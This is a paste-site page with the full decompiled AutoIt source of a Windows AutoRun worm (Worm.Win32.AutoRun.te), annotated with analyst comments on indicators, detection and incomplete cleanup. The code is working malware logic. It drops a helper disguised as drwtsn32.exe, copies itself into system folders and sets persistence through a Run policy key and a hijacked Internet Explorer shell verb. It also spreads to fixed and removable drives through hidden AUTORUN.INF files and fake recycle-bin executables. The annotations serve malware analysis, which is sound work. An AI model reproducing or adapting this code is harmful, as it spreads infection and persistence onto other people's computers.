FlyFar

Worm.Win32.AutoRun.te - Source Code

Jun 12th, 2023
AutoIt 4.89 KB | Cybersecurity | 0 0
  1. ; <AUT2EXE VERSION: 3.2.2.0>
  2.  
  3. ; ----------------------------------------------------------------------------
  4. ; <AUT2EXE INCLUDE-START: C:\$ROOT\var\src\nsdapp\nsdapp.au3>
  5. ; ----------------------------------------------------------------------------
  6.  
  7. #NoTrayIcon
      ; Analyst note: #NoTrayIcon stops AutoIt from showing its tray icon, so the
      ; running script has no visible tray indicator.
  8. Opt("MustDeclareVars",1)
  9.  
      ; File-system locations used by this sample. Each one is a host indicator to
      ; look for during triage:
      ;   $DIRECT      - directory where Nestor() drops the embedded helper as drwtsn32.exe.
      ;   $1ST_CMPNENT - first copy of the script itself (wbem folder under the system directory).
      ;   $IE_CMPNENT  - second copy of the script itself (Internet Explorer program folder).
      ; $target is a global that Fs32() fills with the staging-directory path.
  10. Dim Const $DIRECT=@WindowsDir&"\Debug"
  11. Dim Const $1ST_CMPNENT=@SystemDir&"\wbem\nsdapp.exe"
  12. Dim Const $IE_CMPNENT=@ProgramFilesDir&"\Internet Explorer\Connection Wizard\icwnsdp.exe"
  13. Dim $target
  14.  
  15. Select
      ; Analyst note: command-line dispatcher. The first argument selects the mode:
      ;   (no argument)    - install and propagate: Nestor(1).
      ;   _OPEN_DRIVE      - open an Explorer window on the parent of the script's
      ;                      directory, then Nestor(1). Presumably the argument used by
      ;                      the dropped AUTORUN.INF (its contents are not on this page),
      ;                      so the user still sees the drive open as expected.
      ;   _OPEN_HOME_PAGE  - start Internet Explorer maximized, then Nestor(1). This is
      ;                      the argument Nestor() registers under the CLSID shell verb.
      ;   -expand          - Expand(): copy the staging directory's contents out.
      ;   -gui             - extract embedded gui.dat to %TEMP%\00100001.EXE, run it,
      ;                      wait, delete it. What gui.dat does is not shown here.
      ;   -inactive        - Uninstall(): partial removal (see that function).
      ;   anything else    - a decoy "System error" message box that closes after 9 seconds.
      ; Detection: any process whose command line carries _OPEN_DRIVE or
      ; _OPEN_HOME_PAGE is worth flagging; neither is a normal Explorer or IE argument.
  16.     Case $CmdLine[0]=0
  17.         Nestor(1)
  18.     Case ($CmdLine[1]="_OPEN_DRIVE")
  19.         Run(@WindowsDir&"\Explorer.exe /e,"&@ScriptDir&"\..")
  20.         Nestor(1)
  21.     Case ($CmdLine[1]="_OPEN_HOME_PAGE")
  22.         Run(@ProgramFilesDir&"\Internet Explorer\IEXPLORE.EXE",@ProgramFilesDir&"\Internet Explorer",@SW_MAXIMIZE)
  23.         Nestor(1)
  24.     Case ($CmdLine[1]="-expand")
  25.         Expand()
  26.     Case ($CmdLine[1]="-gui")
  27.         FileInstall("gui.dat",@TempDir&"\00100001.EXE",1)
  28.         RunWait(@TempDir&"\00100001.EXE")
  29.         FileDelete(@TempDir&"\00100001.EXE")
  30.     Case ($CmdLine[1]="-inactive")
  31.         Uninstall()
  32.     Case Else
  33.         MsgBox(262160,"System error","Mouse Pad has performed an illegal instruction ("&$CmdLine[1]&") and will be shut down",9)
  34. EndSelect
  35. Exit (0)
  36.  
  37. Func Fs32()
          ; Analyst note: picks the staging directory and stores it in the global $target.
          ;   NTFS home drive  -> <WindowsDir>\system32\config\systemprofile\NtUser..
          ;   any other FS     -> <HomeDrive>\...
          ; Both names end in dots. NOTE(review): presumably chosen because such names
          ; are awkward to open or delete with ordinary shell tools - confirm on a test
          ; image. When hunting, enumerate these parents with a tool that does not
          ; normalise trailing dots.
          ; Returns: the chosen path (the same value left in $target).
  38.     If DriveGetFileSystem(@HomeDrive)="NTFS" Then
  39.         $target=@WindowsDir&"\system32\config\systemprofile\NtUser.."
  40.     Else
  41.         $target=@HomeDrive&"\..."
  42.     Endif
  43.     Return $target
  44. EndFunc
  45.  
  46. Func Nestor($v)
          ; Analyst note: installation and persistence routine.
          ;   $v = 1 -> also call Recycler() at the end to write to fixed/removable drives.
          ;   $v = 0 -> install only (this is how Expand() calls it).
          ; Sequence visible below:
          ;   1. Extract embedded nsdapp.dat to <WindowsDir>\Debug\drwtsn32.exe (flag 1 =
          ;      overwrite). The file name is borrowed from the Windows Dr. Watson tool;
          ;      a drwtsn32.exe under \Debug is an indicator.
          ;   2. Create the staging directory with a hidden cmd.exe "md".
          ;   3. Run the helper and wait for it, passing one argument: an output path of
          ;      the form <staging>\<ComputerName>_<day-of-year><year>.EXE. What the
          ;      helper writes there is not shown on this page.
          ;   4. Delete the helper, so it is on disk only while it runs.
          ;   5. Copy the script to $1ST_CMPNENT and $IE_CMPNENT unless already running
          ;      from that path; "-SH" clears the System and Hidden attributes on the copy.
          ;   6. Registry changes (persistence and launch hooks) - see comments below.
  47.     $target=Fs32()
  48.     FileInstall("nsdapp.dat",$DIRECT&"\drwtsn32.exe",1)
  49.     RunWait(@COMSPEC&" /c md "&$target&"\",@SystemDir,@SW_HIDE)
  50.     RunWait($DIRECT&"\drwtsn32.exe "&$target&"\"&@ComputerName&"_"&@YDAY&@YEAR&".EXE")
  51.     FileDelete($DIRECT&"\drwtsn32.exe")
  52.     If (@ScriptFullPath)<>($1ST_CMPNENT) Then
  53.         FileCopy(""&@ScriptFullPath&"",$1ST_CMPNENT,1)
  54.         FileSetAttrib($1ST_CMPNENT,"-SH")
  55.     Endif
  56.     If (@ScriptFullPath)<>($IE_CMPNENT) Then
  57.         FileCopy(""&@ScriptFullPath&"",$IE_CMPNENT,1)
  58.         FileSetAttrib($IE_CMPNENT,"-SH")
  59.     Endif
  60.     ;Func Regent
          ; The CLSID below is the Internet Explorer shell namespace (desktop icon)
          ; object. Its OpenHomePage verb is repointed at the icwnsdp.exe copy, so
          ; opening IE through that icon runs the script with _OPEN_HOME_PAGE, which
          ; then starts the real IEXPLORE.EXE. ShellFolder\Attributes is set to 0.
  61.     RegWrite("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command","","REG_SZ",$IE_CMPNENT&" _OPEN_HOME_PAGE")
  62.     RegWrite("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder","Attributes","REG_DWORD",0)
          ; Logon persistence: value "1" = "nsdapp" under the policies\Explorer\Run key.
          ; NOTE(review): the bare name is presumably resolved through the search path
          ; to $1ST_CMPNENT - confirm. This key is less commonly reviewed than
          ; CurrentVersion\Run, so include it in autostart audits.
  63.     RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run","1","REG_SZ","nsdapp")
  64.     If $v=1 Then Recycler()
  65. EndFunc
  66.  
  67. Func Recycler()
          ; Analyst note: drive-propagation routine (the AutoRun behaviour the detection
          ; name refers to). For each drive it:
          ;   - clears Read-only/System/Hidden on any existing AUTORUN.INF so it can be
          ;     overwritten,
          ;   - writes an embedded AUTORUN.INF (auntfs.dat on NTFS, aufat.dat otherwise;
          ;     neither file's contents are shown on this page),
          ;   - marks AUTORUN.INF System+Hidden,
          ;   - copies the running script into the drive's recycle-bin folder as INFO2.EXE
          ;     (\RECYCLER on NTFS, \Recycled otherwise).
          ; Fixed drives are handled first, then removable drives. The removable loop
          ; starts at index 2, so the first removable drive returned is skipped
          ; (presumably the floppy drive - confirm).
          ; Indicators: a System+Hidden AUTORUN.INF at a drive root together with
          ; \RECYCLER\INFO2.EXE or \Recycled\INFO2.EXE. A genuine recycle-bin INFO2 index
          ; file has no .EXE extension.
          ; Mitigation: disabling AutoRun for removable and fixed media (the
          ; NoDriveTypeAutoRun policy) stops the AUTORUN.INF from being honoured; the
          ; copied files still need to be removed.
  68.     Dim $drives=DriveGetDrive("FIXED")
  69.     If NOT @error Then
  70.         For $i = 1 to $drives[0]
  71.             If (DriveGetFileSystem($drives[$i]))="NTFS" Then
  72.                 FileSetAttrib($drives[$i]&"\AUTORUN.INF","-RSH")
  73.                 FileInstall("auntfs.dat",$drives[$i]&"\AUTORUN.INF",1)
  74.                 FileSetAttrib($drives[$i]&"\AUTORUN.INF","+SH")
  75.                 FileCopy(@ScriptFullPath,$drives[$i]&"\RECYCLER\INFO2.EXE",1)
  76.                 FileSetAttrib($drives[$i]&"\RECYCLER\INFO2.EXE","+SH")
  77.             Else
  78.                 FileSetAttrib($drives[$i]&"\AUTORUN.INF","-RSH")
  79.                 FileInstall("aufat.dat",$drives[$i]&"\AUTORUN.INF",1)
  80.                 FileSetAttrib($drives[$i]&"\AUTORUN.INF","+SH")
  81.                 FileCopy(@ScriptFullPath,$drives[$i]&"\Recycled\INFO2.EXE",1)
  82.                 FileSetAttrib($drives[$i]&"\Recycled\INFO2.EXE","+SH")
  83.             Endif
  84.         Next
  85.     Endif
  86.     $drives=""
  87.     $drives=DriveGetDrive("REMOVABLE")
  88.     If NOT @error Then
  89.         For $i = 2 to $drives[0]
          ; On removable media the \Recycled folder is created first, and System+Hidden
          ; is applied to the folder recursively (third argument 1) rather than to the
          ; single file.
  90.             DirCreate($drives[$i]&"\Recycled")
  91.             FileSetAttrib($drives[$i]&"\AUTORUN.INF","-RSH")
  92.             FileInstall("aufat.dat",$drives[$i]&"\AUTORUN.INF",1)
  93.             FileSetAttrib($drives[$i]&"\AUTORUN.INF","+SH")
  94.             FileCopy(@ScriptFullPath,$drives[$i]&"\Recycled\INFO2.EXE",1)
  95.             FileSetAttrib($drives[$i]&"\Recycled","+SH",1)
  96.         Next
  97.     Endif
  98. EndFunc
  99.  
  100. Func Expand()
           ; Analyst note: handler for the "-expand" argument; appears to be the
           ; collection step run by whoever retrieves the staged files.
           ;   1. Resolve the staging directory with Fs32().
           ;   2. Create a folder named after the computer in the current working
           ;      directory and change into it.
           ;   3. Copy everything from the staging directory into it (visible console),
           ;      then rename *.EXE to *.ASM with a hidden cmd.exe.
           ;   4. Show a Yes/No prompt titled "TK-32" with an 80-second timeout. On Yes
           ;      (return value 6) the staging directory is removed with "rd /s /q" and
           ;      Nestor(0) re-runs the install without drive propagation.
           ; Forensics: folders named after a host that contain *.ASM files named
           ; <ComputerName>_<day-of-year><year> are the output of this step.
  101.     $target=Fs32()
  102.     FileChangeDir(@WorkingDir)
  103.     DirCreate(@ComputerName)
  104.     FileChangeDir(@ComputerName)
  105.     RunWait(@COMSPEC&" /c copy "&$target&"\*.*","",@SW_MAXIMIZE)
  106.     RunWait(@COMSPEC&" /c ren *.EXE *.ASM","",@SW_HIDE)
  107.     If (MsgBox(262436,"TK-32","Files inflated in "&@WorkingDir&". Do you want flush the _$target_ folder?",80))==6 Then
  108.         RunWait(@COMSPEC&" /c rd "&$target&"\ /s /q","",@SW_HIDE)
  109.         Nestor(0)
  110.     Endif
  111. EndFunc
  112.  
  113. Func Uninstall()
           ; Analyst note: handler for the "-inactive" argument. It reverses only part
           ; of what Nestor() and Recycler() do, so it is not a complete cleanup.
           ; What it does:
           ;   - deletes AUTORUN.INF from the root of fixed drives and of removable
           ;     drives (removable loop again starts at index 2),
           ;   - points the CLSID OpenHomePage command back at IEXPLORE.EXE,
           ;   - writes Winlogon\Shell = "Explorer.exe" (nothing on this page changes
           ;     that value; presumably a related component does - confirm),
           ;   - deletes value "1" from the policies\Explorer\Run key.
           ; What it leaves behind, per the code visible here:
           ;   - the INFO2.EXE copies under \RECYCLER and \Recycled,
           ;   - the copies at $1ST_CMPNENT and $IE_CMPNENT,
           ;   - the staging directory chosen by Fs32() and its contents,
           ;   - ShellFolder\Attributes = 0 under the same CLSID.
           ; Remediation must cover those items separately. FileDelete is also called
           ; without first clearing the System+Hidden attributes set by Recycler();
           ; verify afterwards that AUTORUN.INF is really gone.
  114.     Dim $drives=DriveGetDrive("FIXED")
  115.     If NOT @error Then
  116.         For $i = 1 to $drives[0]
  117.             FileDelete($drives[$i]&"\AUTORUN.INF")
  118.         Next
  119.     Endif
  120.     $drives=""
  121.     $drives=DriveGetDrive("REMOVABLE")
  122.     If NOT @error Then
  123.         For $i = 2 to $drives[0]
  124.             FileDelete($drives[$i]&"\AUTORUN.INF")
  125.         Next
  126.     Endif
  127.     RegWrite("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command","","REG_SZ",@ProgramFilesDir&"\Internet Explorer\IEXPLORE.EXE")
  128.     RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_SZ","Explorer.exe")
  129.     RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run","1")
  130. EndFunc
  131.  
  132. ; ----------------------------------------------------------------------------
  133. ; <AUT2EXE INCLUDE-END: C:\$ROOT\var\src\nsdapp\nsdapp.au3>
  134. ; ----------------------------------------------------------------------------
  135.  